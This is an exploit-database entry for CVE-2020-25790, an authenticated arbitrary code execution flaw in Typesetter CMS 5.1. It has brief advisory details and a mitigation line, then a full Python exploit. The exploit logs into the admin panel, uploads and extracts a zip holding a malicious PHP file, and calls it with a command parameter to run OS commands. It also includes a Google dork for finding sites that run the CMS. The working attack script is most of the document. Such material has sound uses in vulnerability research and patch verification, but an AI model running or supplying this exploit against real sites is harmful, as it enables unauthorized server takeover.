Typesetter CMS 5.1 - Arbitrary Code Execution

vendor:

Typesetter CMS

by:

Rodolfo 't0gu' Tavares

7.2

CVSS

HIGH

Arbitrary Code Execution

CWE

Product Name: Typesetter CMS

Affected Version From: 5.1

Affected Version To: 5.1

Patch Exists: YES

Related CWE: CVE-2020-25790

CPE: a:typesettercms:typesetter_cms:5.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux / Apache

2020

Typesetter CMS 5.1 – Arbitrary Code Execution

The CMS Typesetter has functionality (web interface) where it is possible through an account with privileges to perform uploads. Through this functionality, it is possible to upload a .zip file that contains a malicious .php file. In the same functionality, there is also the possibility to extract the file through the same web interface, the attacker only needs to extract the .zip that was previously loaded and click on the malicious .php file to execute commands in the operating system.

Mitigation:

Ensure that the web application is configured to only allow uploads of files with the appropriate extensions and that the application is configured to only allow the execution of files with the appropriate extensions.

Source

Exploit-DB raw data:

# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution
# Exploit Author: Rodolfo "t0gu" Tavares
# Contact: @t0guu (TW)
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Linux / Apache
# Category: WebApp
# Google Dork: intext:"Powered by Typesetter"
# Date: 2020-09-29
# CVE : CVE-2020-25790

######## Description ########
#
# The CMS Typesetter has functionality (web interface) where it is possible
# through an account with privileges to perform uploads. Through this
# functionality, it is possible to upload a .zip file that contains a
# malicious .php file. In the same functionality, there is also the
# possibility to extract the file through the same web interface, the
# attacker only needs to extract the .zip that was previously loaded and
# click on the malicious .php file to execute commands in the operating
# system.
#

######## Exploit with Poc ########


https://github.com/t0gu/CVE-2020-25790

####### Code #######


# see the poc at https://github.com/t0gu/CVE-2020-25790

import argparse
from bs4 import BeautifulSoup
import requests
import sys
import  re


import urllib3
from urllib3.exceptions import InsecureRequestWarning

banner = """ 

 
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗  ██████╗       ██████╗ ███████╗███████╗ █████╗  ██████╗ 
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔═████╗      ╚════██╗██╔════╝╚════██║██╔══██╗██╔═████╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝██║██╔██║█████╗ █████╔╝███████╗    ██╔╝╚██████║██║██╔██║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ████╔╝██║╚════╝██╔═══╝ ╚════██║   ██╔╝  ╚═══██║████╔╝██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗╚██████╔╝      ███████╗███████║   ██║   █████╔╝╚██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝       ╚══════╝╚══════╝   ╚═╝   ╚════╝  ╚═════╝ 
                                                                                                                                                                                                                    
by: t0gu


usage: main.py [-h] -p PASSWORD -l LOGIN -u URL

==> Exploit for CVE 2020-25790

optional arguments:
  -h, --help            show this help message and exit
  -p PASSWORD, --password PASSWORD
                        ==> admin password
  -l LOGIN, --login LOGIN
                        ==> admin login
  -u URL, --url URL     ==> main URL

  """

print(banner)
menu = argparse.ArgumentParser(description="==> Exploit for CVE 2020-25790")
menu.add_argument("-p", "--password", required=True, help="==> admin password")
menu.add_argument("-l", "--login", required=True, help="==> admin login")
menu.add_argument("-u", "--url", required=True, help="==> main URL")
menu.add_argument("-f", "--file", required=True, help="==> Malicous zip file with php file inside")
args = menu.parse_args()

login = args.login
password = args.password
url = args.url
file = args.file


PROXIES = proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "https://127.0.0.1:8080",
}


class Exploit:

    def __init__(self, login, password, url, file):
        self.login = login
        self.password = password
        self.url = url
        self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari"
        self.file = open(file, 'rb')

    def get_nounce(self):
        try:
            url = self.url + "/Admin"
            r = requests.get(url=url, headers={'User-Agent': self.user_agent}, timeout=3, verify=False)
            data = r.text
            soap_obj = BeautifulSoup(data, 'html.parser')
            for inp in soap_obj.find_all("input"):
                for v in inp:
                    nounce = v['value']
                    if nounce != None or nounce != "":
                        return nounce
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')

    def get_hash_folders(self):

        cookie_auth = self.get_cookies()
        hash_verified = self.get_verified()
        data_post = {'verified': hash_verified, 'cmd': 'open', 'target':'', 'init': 1, 'tree': 1}
        try:
            url = self.url + "/Admin_Finder"
            r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': cookie_auth}, timeout=10, verify=False)
            json_data = r.json()
            hash_dir = json_data['files'][2]['hash']
            return hash_dir
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')

    def get_cookies(self):

        nounce = self.get_nounce()
        if nounce:
            try:
                url = self.url + "/Admin"
                data_post = {'file': '', 'cmd': 'login', 'login_nonce': nounce, 'username': self.login, 'user_sha': '',
                             'password': self.password, 'pass_md5': '', 'pass_sha': '', 'pass_sha512': '',
                             'remember': 'on', 'verified': ''}
                r = requests.post(url=url, verify=False, timeout=3, data=data_post, allow_redirects=False,
                                  headers={'User-Agent': self.user_agent, 'Cookie': 'g=2'})
                cookie_admin = r.headers['Set-Cookie']
                cookie_name = cookie_admin.split(':')[0].split('=')[0]
                cookie_value = cookie_admin.split(':')[0].split('=')[1].split(';')[0]

                if cookie_name == None or cookie_name == "":
                    if cookie_value == None or cookie_value == "":
                        print("==> Something went wrong while login")
                else:
                    data = f"{cookie_name}={cookie_value};"
                    return data
            except (requests.exceptions.Timeout, requests.exceptions.BaseHTTPError) as e:
                print(f'==> Error while login {e}')

    def upload_zip(self):
        url = self.url + '/Admin_Finder'
        hash_verified = self.get_verified()
        hash_dir = self.get_hash_folders()
        auth_cookie = self.get_cookies()

        try:
            print(f"==> Uploading file: {self.file}")
            data = {'cmd': "upload", "target": hash_dir, "verified": hash_verified}
            r = requests.post(url=url, verify=False, timeout=10,
                              headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, data=data, files={'upload[]': self.file})
            hash_file = r.json()['added'][0]['hash']
            self.extract_file(auth_cookie, hash_file, hash_verified)
        except (requests.exceptions.HTTPError, requests.exceptions.Timeout) as e:
            print(f"==> Error while uploading {e}")


    def extract_file(self, auth_cookie, hash_file, hash_verified):
        data_post={'verified': hash_verified, 'cmd': 'extract', 'target': hash_file}
        try:
            url = self.url + "/Admin_Finder"
            r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
            name_file = r.json()['added'][0]['name']
            print(f"==> All Hashes are collected from: {name_file}") 
            self.xpl(auth_cookie,name_file)
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')


    def xpl(self, auth_cookie, name_file):
        try:
            url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id"
            new_url = url.replace("index.php", "")
            print(f"==> Try to exploit: {new_url}")
            r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
            pattern = r'<pre>(.*?)</pre>'
            m = re.search(pattern, r.text.replace("\n", ""))
            if m is not None and m != "":
                print(f"==> Vulnerable: {m.group(1)}")
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')


    def get_verified(self):
        try:
            url = self.url + "/Admin/Uploaded"
            auth_cookie = self.get_cookies()
            r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
            data = r.text
            pattern_regex = r'"verified":"(.*)"}'
            m = re.search(pattern_regex, data)
            if m is not None or m != "":
                return m.group(1)

        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')

if __name__ == "__main__":
    obj = Exploit(login, password, url, file)
    obj.upload_zip()